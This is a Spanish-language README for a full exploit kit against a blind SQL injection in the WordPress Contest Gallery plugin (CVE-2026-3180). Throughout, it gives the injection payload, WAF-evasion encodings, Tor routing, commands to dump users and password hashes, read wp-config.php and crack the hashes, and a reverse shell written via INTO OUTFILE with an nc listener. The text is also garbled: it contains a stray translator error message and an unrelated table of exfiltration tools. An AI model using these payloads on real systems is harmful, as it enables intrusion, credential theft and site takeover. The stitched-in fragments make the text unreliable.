
Kit de explotación completo para CVE-2026-3180 - Vulnerabilidad de inyección SQL en WordPress Contest Gallery. Incluye extracción automatizada de datos, evasión de WAF, shell inversa, integración con SQLMap, generación de extensiones de Burp e informes para pruebas de penetración e investigación de seguridad.
Herramienta de evaluación de prueba de concepto para CVE-2026-3180
Autor: Sudeepa Wanigarathna · Descubrimiento original: cardosource
[!IMPORTANT] Uso autorizado únicamente. Esta herramienta es para investigación en seguridad, educación y pruebas de sistemas que posea o para los que tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso.
CVE-2026-3180 es una inyección SQL ciega sin autenticar de alta gravedad en el plugin Contest Gallery de WordPress. El fallo existe en el manejador AJAX post_cg1l_resend_unconfirmed_mail_frontend, donde el parámetro cgl_mail se pasa a una consulta SQL sin la sanitización adecuada.
Este repositorio proporciona un PoC completo en Python (v2.0) para que profesionales de seguridad autorizados validen el impacto, extraigan datos de WordPress, generen informes y se integren con herramientas estándar de la industria (SQLMap, Burp Suite, Nuclei).
| Campo | Valor |
|---|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20
### Referencias
- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [Artículo original (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)
---
## Características
### Explotación principal
| Capacidad | Descripción |
|---|---|
| Detección de vulnerabilidades | Pruebas booleanas, basadas en tiempo, basadas en errores, unión y consultas apiladas |
| Extracción ciega | Extracción de caracteres mediante búsqueda binaria por inferencia booleana |
| Volcado completo de datos | Usuarios, metadatos de la base de datos, opciones, plugins, temas, entradas, tablas |
| Shell SQL interactivo | Ejecutar consultas `SELECT` arbitrarias contra el backend |
| Extracción de wp-config.php | Intentos de `LOAD_FILE()` contra rutas comunes |
| Shell inversa | Escritura de webshell PHP mediante `INTO OUTFILE` / `DUMPFILE` (cuando esté permitido) |
### Evasión y rendimiento
| Capacidad | Descripción |
|---|---|
| Bypass de WAF | Más de 15 técnicas de codificación y ofuscación |
| Multihilo | Hilos de trabajo configurables para una extracción más rápida |
| Limitación de velocidad | Retardo configurable entre solicitudes |
| Lógica de reintento | Reintentos automáticos en fallos transitorios |
| Rotación de User-Agent | Huellas dactilares de navegador aleatorias por solicitud |
| Soporte de proxy | Proxies HTTP/SOCKS y Tor (`socks5h://127.0.0.1:9050`) |
### Informes e integraciones
| Capacidad | Descripción |
|---|---|
| Generación de informes | Informes JSON y HTML con resúmenes de extracción |
| Integración con SQLMap | Comando SQLMap autogenerado con tamperers |
| Extensión de Burp Suite | Generador + `burp_contest_gallery.py` independiente |
| Plantilla de Nuclei | Plantilla YAML para detección masiva |
| Módulo de Metasploit | Módulo auxiliar en Ruby (`contest_gallery_sqli.rb`) |
| Automatización de shell | Scripts Bash para flujos de trabajo basados en curl y SQLMap |
### Operativo
| Capacidad | Descripción |
|---|---|
| Salida CLI coloreada | Registro estructurado con niveles de gravedad |
| Seguimiento de progreso | Métricas en tiempo real (solicitudes, tiempos, velocidad de extracción) |
| Modos silencioso y detallado | Adecuado para scripts y depuración |
| Manejo de señales | Limpieza ordenada con `Ctrl+C` |
| Listo para Docker | Soporte de despliegue en contenedores |
| Listo para pipelines CI/CD | Códigos de salida y salida JSON para automatización |
---
## Instalación
### Requisitos previos
- Python **3.8+**
- `pip`
- Accesibilidad de red al objetivo(s) bajo prueba
### Herramientas externas opcionales
| Herramienta | Propósito |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | Inyección SQL automatizada |
| [Burp Suite](https://portswigger.net/burp) | Pruebas manuales y alojamiento de extensiones |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | Escaneo basado en plantillas |
| [Hashcat](https://hashcat.net/hashcat/) | Descifrado de hashes sin conexión |
| [Tor](https://www.torproject.org/) | Enrutamiento anónimo (`--proxy tor`) |
### Configuración```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
Requeridas (tiempo de ejecución):```text requests>=2.31.0
**Recomendado (de requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
El exploit principal utiliza solo la biblioteca estándar de Python además de
requests. Paquetes adicionales mejoran la salida y los informes.
Reemplaza
http://target.examplecon un objetivo de laboratorio o autorizado únicamente.
python3 cve-2026-3180.py http://target.example --scan
### Explotación completa (detectar + extraer)```bash
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
### Shell SQL interactiva```bash
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
### A través del proxy de Burp```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
Ejecuta detección booleana, basada en tiempo y basada en errores sin extracción completa.
### Extracción completa de datos```bash
python3 cve-2026-3180.py http://target.example --dump all
Extrae información de la base de datos, usuarios, opciones, plugins, temas, publicaciones, tablas y metadatos del sistema.
python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes
### Shell SQL interactivo```bash
python3 cve-2026-3180.py http://target.example --sql-shell
sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]
sql> show tables ["wp_users", "wp_posts", "wp_options", ...]
sql> exit
**Comandos del shell:**
| Comando | Descripción |
|---|---|
| `SELECT ...` | Ejecuta una consulta SQL y muestra el resultado |
| `show users` | Muestra los usuarios extraídos en caché |
| `show tables` | Muestra la lista de tablas en caché |
| `show database` | Muestra los metadatos de la base de datos en caché |
| `show config` | Muestra wp-config.php si fue extraído |
| `show options` | Muestra las opciones de WordPress |
| `show plugins` | Muestra los plugins activos |
| `help` | Lista los comandos disponibles |
| `exit` / `quit` | Salir del shell |
### Generación de informes```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json
# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html
nc -lvnp 4444
python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444
> Requiere privilegio `FILE`, webroot escribible, y que `secure_file_priv` no bloquee la ruta de destino.
### Generación de comandos de SQLMap```bash
python3 cve-2026-3180.py http://target.example --sqlmap
O usa el script de automatización incluido:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example
### Extensión de Burp Suite```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension
# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py
python3 cve-2026-3180.py http://target.example --nuclei-template
nuclei -u http://target.example -t CVE-2026-3180.yaml
### Automatización con Bash (sin Python)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example
python3 cve-2026-3180.py http://target.example --proxy tor
### Ajuste de rendimiento```bash
python3 cve-2026-3180.py http://target.example \
--threads 20 \
--timeout 15 \
--delay 0.1 \
--retries 5 \
-v
| Argumento | Descripción |
|---|---|
target | URL base de WordPress objetivo (ej. http://target.example) |
| Argumento | Descripción |
|---|---|
--verbose, -v | Habilitar registro de depuración |
--quiet | Suprimir salida de consola |
| , |
La herramienta prueba y utiliza automáticamente múltiples estrategias de inyección:
El PayloadManager rota a través de 12+ plantillas de inyección:```text
'OR//{condition}#@teste.com
'OR{condition}-- -
')OR{condition}#
'))OR{condition}#
'OR//{condition}OR//'1'='1'#
'UNION//SELECT{condition}#
...
### Algoritmo de Extracción Booleana
1. Confirmar vulnerabilidad mediante longitudes de línea base verdadero/falso
2. Búsqueda binaria de `LENGTH()` del resultado de la consulta objetivo
3. Búsqueda binaria de `ASCII(SUBSTRING(...))` por posición de carácter
4. Ensamblar la cadena completa a partir de los caracteres extraídos
---
## Bypass de WAF
Técnicas de ofuscación integradas aplicadas aleatoriamente o bajo demanda:
| Técnica | Descripción |
|---|---|
| `comment_obfuscation` | Reemplazar espacios con `/**/`, `/*!*/`, `-- `, `#` |
| `case_variation` | Mayúsculas/minúsculas aleatorias en caracteres alfabéticos |
| `url_encoding` | Codificación porcentual estándar |
| `double_url_encoding` | Codificación porcentual anidada |
| `hex_encoding` | Codificación hexadecimal estilo `%41` |
| `unicode_encoding` | Codificación Unicode estilo `%u0041` |
| `white_space_variation` | Tabulaciones, saltos de línea, avances de página en lugar de espacios |
| `keyword_obfuscation` | Dividir palabras clave: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | Concatenación con `CHAR()` mediante `\|\|` |
| `char_obfuscation` | Adición con `CHAR()` mediante `+` |
Ejemplo de payload transformado:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com
{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }
### Descifrado de hashes de contraseñas (offline)
Después de la extracción, descifra los hashes phpass de WordPress con Hashcat:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json
# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Comando generado (vía --sqlmap):```bash
sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs
### Burp Suite
1. Cargue `burp_contest_gallery.py` en **Extender → Extensions → Add**
2. Abra la pestaña **CVE-2026-3180**
3. Introduzca la URL objetivo y haga clic en **Exploit**
4. El escáner pasivo verifica las solicitudes AJAX en busca de indicadores de Contest Gallery
### Nuclei```yaml
id: CVE-2026-3180
info:
name: WordPress Contest Gallery SQL Injection
severity: high
classification:
cve-id: CVE-2026-3180
cvss-score: 7.5
requests:
- method: POST
path: /wp-admin/admin-ajax.php
body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/
msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"
---
## Cadena de Ataque```mermaid
flowchart TD
A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
B --> C{"Injection type?"}
C -->|Boolean| D["Response length inference"]
C -->|Time| E["SLEEP delay inference"]
C -->|Error| F["SQL error leakage"]
D --> G["Binary-search extraction"]
E --> G
F --> G
G --> H["WordPress data exfiltration"]
H --> I["Users / hashes / options / config"]
I --> J["Optional: OUTFILE webshell"]
post_cg1l_resend_unconfirmed_mail_frontend en el plugin Contest Gallery.cgl_mail concatenado en SQL sin parametrización.[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!
### Estructura del informe JSON```json
{
"metadata": {
"cve": "CVE-2026-3180",
"cvss_score": "7.5 (High)",
"type": "boolean_based"
},
"target": {
"url": "http://target.example",
"ajax_url": "http://target.example/wp-admin/admin-ajax.php"
},
"vulnerability": {
"vulnerable": true,
"type": "boolean_based"
},
"extracted_data": {
"database": { "name": "wordpress", "version": "8.0.35" },
"users": [],
"tables": [],
"plugins": [],
"options": {}
},
"summary": {
"users_found": 3,
"tables_found": 12,
"plugins_found": 8,
"config_extracted": false
}
}
Los informes se guardan en reports/ por defecto.
FROM python:3.11-slim
WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt
ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]
I can't proceed because no content was provided after "INPUT:". Please include the Markdown text to translate.```bash
# Build
docker build -t cve-2026-3180 .
# Scan
docker run --rm cve-2026-3180 http://target.example --scan
# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
http://target.example --report json
Ejemplo de flujo de trabajo de GitHub Actions para escaneos de staging autorizados:```yaml name: CVE-2026-3180 Staging Scan
on: workflow_dispatch: schedule: - cron: '0 2 * * 1'
jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install -r requirements.txt
- name: Vulnerability scan
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--scan --quiet
continue-on-error: true
- name: Generate report
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--report json -o reports/staging.json
- uses: actions/upload-artifact@v4
with:
name: security-report
path: reports/
## Solución de problemas
| Síntoma | Qué probar |
|---|---|
| El objetivo no es vulnerable | Confirmar que Contest Gallery ≤ 28.1.4 está instalado y activo |
| Sin diferencia en la longitud de la respuesta | Prueba `--scan` para fallback basado en tiempo; aumenta `--timeout` |
| Extracción muy lenta | Aumenta `--threads`; reduce `--delay` con precaución |
| Errores de conexión | Aumenta `--timeout` y `--retries`; verifica la configuración del proxy |
| WAF bloquea peticiones | Usa `--proxy tor`; la herramienta aplica técnicas de bypass automáticamente |
| El proxy Tor falla | Verifica Tor en `127.0.0.1:9050`; instala `requests[socks]` si es necesario |
| El volcado de usuarios está vacío | Es posible que el prefijo de tabla no sea `wp_`; usa `--sql-shell` con consultas personalizadas |
| wp-config no encontrado | Prueba `--sql-shell` con rutas alternativas de `LOAD_FILE()` |
| Falla de reverse shell | Verifica el privilegio `FILE`, `secure_file_priv`, permisos del webroot |
### Flujo de trabajo de depuración```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v
# Through Burp
python3 cve-2026-3180.py http://target.example \
--proxy http://127.0.0.1:8080 -v --scan
# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
-d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
-w "\nSize: %{size_download}\n"
exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)
---
## Historial de versiones
### v2.0.0 — Edición Definitiva (Enero de 2026)
- Detección de inyecciones booleanas, temporales, de error, UNION y apiladas
- Pipeline completo de extracción de datos de WordPress
- Más de 15 técnicas de evasión de WAF
- Shell SQL interactivo
- Generación de informes JSON/HTML
- Integraciones con SQLMap, Burp y Nuclei
- Shell inversa mediante `INTO OUTFILE`
- Soporte para proxy y Tor
- Multihilo con lógica de reintento
- Salida coloreada y registro estructurado
### v1.0 — Lanzamiento inicial
- Detección básica de booleanos
- Extracción manual de usuarios
---
## Descargo de responsabilidad
Este proyecto se proporciona **tal cual** para **investigación de seguridad defensiva** y **pruebas de penetración autorizadas**.
Al utilizar este software, usted acepta que:
1. Solo atacará sistemas propios o que tenga autorización explícita para probar.
2. Comprende las leyes aplicables de abuso informático y protección de datos.
3. El autor y los colaboradores **no son responsables** de daños, pérdida de datos o consecuencias legales derivadas del mal uso.
Si descubre esta vulnerabilidad en producción, siga las prácticas de divulgación responsable y coordine con el proveedor del plugin / el equipo de seguridad de WordPress según corresponda.
---
## Autor y créditos
| Rol | Nombre |
|---|---|
| **Autor de la herramienta** | Sudeepa Wanigarathna |
| **Descubrimiento original** | cardosource |
| **CVE** | CVE-2026-3180 |
| **Licencia** | MIT |
---
## Licencia
MIT```
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
Solo para pruebas de seguridad autorizadas.
| Atributo | Valor |
|---|
| CVE ID | CVE-2026-3180 |
| CVSS | 7.5 (Alta) |
| Vector de ataque | Red — sin autenticar |
| Impacto | Violación de confidencialidad, lectura de base de datos, robo de credenciales |
| Producto afectado | WordPress Contest Gallery plugin |
| Versiones afectadas | 28.1.4 y anteriores |
| Tipo de vulnerabilidad | Inyección SQL ciega |
| DBMS | MySQL / MariaDB |
| URL | /wp-admin/admin-ajax.php |
| Método | POST |
| Acción | post_cg1l_resend_unconfirmed_mail_frontend |
| Parámetro vulnerable | cgl_mail |
| Herramienta | Descripción | Requiere Bash v4+ |
|---|
| 1.1 - Cloakify | Exfiltración de datos mediante diversas técnicas de codificación. | Sí |
| 1.2 - DET (Data Exfiltration Toolkit) | Prueba de exfiltración de datos sobre varios protocolos. | No |
| 1.3 - Egress-Assess | Prueba de capacidades de transferencia de datos de salida. | No |
| 1.4 - pwnbin | pwnboard para pobres, rastrea la exfiltración a través de pastebins públicos. | No |
| 1.5 - USB-Rubber-Ducky | Payloads de USB Rubber Ducky para exfiltración de datos. | No |
| sql> SELECT DATABASE() | ||
| wordpress |
| Argumento | Por defecto | Descripción |
|---|
--proxy | — | URL de proxy o tor para SOCKS5 vía Tor |
--timeout | 10 | Tiempo de espera de petición HTTP (segundos) |
--delay | 0.05 | Retardo entre peticiones (segundos) |
--retries | 3 | Número de reintentos en peticiones fallidas |
--threads, -t | 5 | Tamaño del grupo de hilos |
--output-o| Ruta de archivo de salida personalizada |
| Argumento | Descripción |
|---|
| (por defecto) | Exploit completo: detectar → escanear → extraer todo |
--scan | Solo detección de vulnerabilidades |
--sql-shell | Shell SQL interactivo |
--dump {users,config,database,options,plugins,themes,all} | Extraer datos específicos |
--report {json,html} | Generar informe de evaluación |
--reverse-shell LHOST LPORT | Intentar reverse shell mediante escritura de archivo |
--sqlmap | Imprimir comando de SQLMap |
--burp-extension | Generar extensión de Burp Suite |
--nuclei-template | Generar plantilla YAML de Nuclei |
| Tipo | Método de detección | Caso de uso |
|---|
| Basado en booleanos | Diferencial de longitud de respuesta (1=1 vs 1=2) | Motor de extracción principal |
| Basado en tiempo | Inferencia de retardo SLEEP() | Alternativa cuando las señales booleanas son débiles |
| Basado en errores | EXTRACTVALUE() / cadenas de error SQL | Metadatos rápidos cuando se filtran errores |
| Basado en UNION | Payloads UNION SELECT | Recuperación directa de valores (cuando sea aplicable) |
| Consultas apiladas | Sintaxis '; ... # | Ejecución de múltiples sentencias (raro) |
| Objetivo | Fuente SQL | Clave de Salida |
|---|
| Nombre de la base de datos | SELECT DATABASE() | database.name |
| Versión de la BD | SELECT VERSION() | database.version |
| Usuario de la BD | SELECT USER() | database.user |
| Tablas | information_schema.TABLES | tables[] |
| Columnas | information_schema.COLUMNS | columns{} |
| Usuarios de WP | wp_users | users[] |
| Hashes de contraseñas | wp_users.user_pass | users[].password_hash |
| Correos electrónicos | wp_users.user_email | users[].email |
| Roles | wp_usermeta capabilities | users[].roles |
| Opciones del sitio | wp_options | options{} |
| Plugins activos | wp_options.active_plugins | plugins[] |
| Temas | opciones template / stylesheet | themes[] |
| Entradas | wp_posts | posts[] |
| wp-config.php | LOAD_FILE('/var/www/html/wp-config.php') | config |
| Información del sistema | @@hostname, @@datadir, etc. | system_info{} |